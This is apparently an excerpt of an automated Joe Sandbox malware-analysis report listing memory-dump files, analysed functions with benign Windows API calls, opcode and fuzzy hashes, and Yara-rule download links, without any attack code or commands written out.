Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 15b952b4cf0a35188bb4e6203cdc0e6ecfc5ac74ba7dfaeaea1f86e3a5302e5e
Instruction ID: 105bccd0f3f0dafd7eddae109a0dab89fbb9c67852651f4d6307114b285bac54
Opcode Fuzzy Hash: 15b952b4cf0a35188bb4e6203cdc0e6ecfc5ac74ba7dfaeaea1f86e3a5302e5e
Instruction Fuzzy Hash: 69F0E97160112566EB613AFA9D08A9B3B98DF45370F188061DE8C9718CEB3CD40087E0

Function 00FE87B2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,00FEDA1D,?,?,?,?), ref: 00FE87B9

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 40c05251fc49c1c210502f99dc0c99b4b95c127d70da21c371942575893f66a4
Instruction ID: b7e4464822c757cf5fba1ccc63cbf186a2cc4f5be29e21f9b7e65423f8534e18
Opcode Fuzzy Hash: 40c05251fc49c1c210502f99dc0c99b4b95c127d70da21c371942575893f66a4
Instruction Fuzzy Hash: 1FC08C284116400AEE1C293980988A83346598F7F87F42B84E07C6F1E1CA356807B211

Function 00FE87B0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,00FEDA1D,?,?,?,?), ref: 00FE87B9

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 6b0aa79ff081b1e45ced8e674b52874b77e6c84680d9499e0e8caa20cce270b0
Instruction ID: aee2ac0c243f74a41e58cad7aa8b58f80cf5693564f1151f4e352e604353f293
Opcode Fuzzy Hash: 6b0aa79ff081b1e45ced8e674b52874b77e6c84680d9499e0e8caa20cce270b0
Instruction Fuzzy Hash: F2C08C384112404AEB1C6A3990988243706AA4B7B83F01B98E0396F1E1CB32D403E7A1

Function 00FEB1A0 Relevance: 1.5, APIs: 1, Instructions: 244COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00FEB3C8

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6c29e557cf50df166c334e62e1ddda08bae8d8d514e12c8859857063d623cfc9
Instruction ID: 47a0102d8928ea3aef7db32caec6deefe91cce58139e1ab5bb74470ed1cc061e
Opcode Fuzzy Hash: 6c29e557cf50df166c334e62e1ddda08bae8d8d514e12c8859857063d623cfc9
Instruction Fuzzy Hash: 75B11570A10268DFEB29CF15CC94BDEB7B5EF05304F5045D8E909A7291D775AA88CF90

Function 049E080E Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

1bW, xrefs: 049E08AD

Memory Dump Source

Source File: 00000000.00000002.1708550965.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49e0000_file.jbxd

Similarity

API ID:
String ID: 1bW
API String ID: 0-2888975267
Opcode ID: f0916079767008f78262dfd9b107902a8cc0729958a2fed970167ef5c36e9f41
Instruction ID: d807ea981024618ec7d311b0726df85fd67da9fb4710985dd6162631aad6fed9
Opcode Fuzzy Hash: f0916079767008f78262dfd9b107902a8cc0729958a2fed970167ef5c36e9f41
Instruction Fuzzy Hash: D111C6EB64C135BE318394836714AB6266FE5D73303308976F90BD6102F2D65E8A35B1

Function 049E081D Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

1bW, xrefs: 049E08AD

Memory Dump Source

Source File: 00000000.00000002.1708550965.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49e0000_file.jbxd

Similarity

API ID:
String ID: 1bW
API String ID: 0-2888975267
Opcode ID: 3a3606fabbac53c28f915297c875c0e847a5f84af889f1e5c6c18563654bd0a2
Instruction ID: 493a155566f152a1576ead38732f956c6fa1e13b96e1d6d978d050028045d617
Opcode Fuzzy Hash: 3a3606fabbac53c28f915297c875c0e847a5f84af889f1e5c6c18563654bd0a2
Instruction Fuzzy Hash: 3211E5EB64C135BE7283848367149BA6B6EE5D7330330C972F94BD6102F1D61E8A31B1

Function 049E0899 Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

1bW, xrefs: 049E08AD

Memory Dump Source

Source File: 00000000.00000002.1708550965.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49e0000_file.jbxd

Similarity

API ID:
String ID: 1bW
API String ID: 0-2888975267
Opcode ID: da2a5c5f988ab9ffd233ee498b67a58dbd27ae2a39c21fd90d523e4fe0c1d718
Instruction ID: 3630a7c6c56cb966231955b31e94d86ef0f476a40ec5e21b5289cbebdc16fb6c
Opcode Fuzzy Hash: da2a5c5f988ab9ffd233ee498b67a58dbd27ae2a39c21fd90d523e4fe0c1d718
Instruction Fuzzy Hash: 57112BEB60C2217FA243845356259767B2EE9D67303358877F943D6042F1864D4A21B1

Function 049E0839 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

1bW, xrefs: 049E08AD

Memory Dump Source

Source File: 00000000.00000002.1708550965.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49e0000_file.jbxd

Similarity

API ID:
String ID: 1bW
API String ID: 0-2888975267
Opcode ID: 7b258a0173cc2a0d30ab6dc5f28cc81ae57fd5cdcd68cb8226de24bfef5fb711
Instruction ID: 8c1578c0fb9d9148770d8511b2a56f4553da5c724ed27060674f7e270634d93b
Opcode Fuzzy Hash: 7b258a0173cc2a0d30ab6dc5f28cc81ae57fd5cdcd68cb8226de24bfef5fb711
Instruction Fuzzy Hash: 6501D6EB24C131FE71838443AB24AF72B6FE5D63303308932F54BD6142E2D61A8A3171

Function 049E0851 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

1bW, xrefs: 049E08AD

Memory Dump Source

Source File: 00000000.00000002.1708550965.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49e0000_file.jbxd

Similarity

API ID:
String ID: 1bW
API String ID: 0-2888975267
Opcode ID: 091c837533fe63f83b6f2f37c7f750566bd58e53c3d4f699c7cb0dabe2470e35
Instruction ID: aae471ee5bb50c371f4127992854cd3602adc45a781ab2b4b56d921739bab9a2
Opcode Fuzzy Hash: 091c837533fe63f83b6f2f37c7f750566bd58e53c3d4f699c7cb0dabe2470e35
Instruction Fuzzy Hash: AB1129E760C231BEF28385926A246B66B6EE6D73303358877F543D6142E2C60D4A22B1

Function 049E087C Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

1bW, xrefs: 049E08AD

Memory Dump Source

Source File: 00000000.00000002.1708550965.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49e0000_file.jbxd

Similarity

API ID:
String ID: 1bW
API String ID: 0-2888975267
Opcode ID: 525fcfc858fbbb0d4934bd8ece729c13ab188272c452740ca22709a40827e68a
Instruction ID: b0b0305a5f8f5a75ef6b9173f16f77c2f1fda48a20c5dfecc608265869d0444b
Opcode Fuzzy Hash: 525fcfc858fbbb0d4934bd8ece729c13ab188272c452740ca22709a40827e68a
Instruction Fuzzy Hash: 53F0F4E760C121BEB18384836A14AB6679EF5D63303348877F547D9142E2CA0E4A2271

Non-executed Functions

Function 010231A8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 01023323

Strings

1#SNAN, xrefs: 010244BA
1#INF, xrefs: 010244DE
1#IND, xrefs: 010244B3
1#QNAN, xrefs: 010244C1

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
